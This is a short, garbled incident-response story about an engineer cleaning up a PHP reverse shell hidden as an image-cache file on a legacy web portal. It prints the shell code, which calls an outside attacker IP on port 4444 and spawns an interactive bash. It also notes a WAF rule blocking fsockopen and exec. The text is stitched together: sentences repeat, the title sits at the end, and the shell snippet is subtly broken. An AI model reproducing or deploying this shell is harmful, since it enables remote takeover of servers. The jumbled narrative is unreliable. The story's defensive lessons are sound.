Last week, a scanner had found it. She’d logged the ticket as "Low Priority."
At the post-mortem, her manager asked, "How could we have caught this sooner?" php reverse shell
<?php // A minimal, dangerous reverse shell set_time_limit(0); $ip = '185.143.223.12'; // Attacker's server $port = 4444; $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) die(); shell_exec('/bin/bash -i <&3 >&3 2>&3'); ?> The attacker had simply browsed to https://legacy-portal.com/images/logo_cache.php . The script called back to their listening netcat session. From there, they ran whoami , ls -la , and began exploring her database config file. Last week, a scanner had found it
And if you ever see a call to fsockopen followed by a shell command in your logs? That's not a bug. That's a break-in in progress. From there, they ran whoami , ls -la
Maya’s hands moved fast. She killed the outbound process from the firewall, took the portal offline, and rotated every secret. By dawn, she had removed the shell, fixed the upload filter, and pushed a WAF rule to block fsockopen and exec in any uploaded file.
The Legacy Server and the 3 AM Wake-Up Call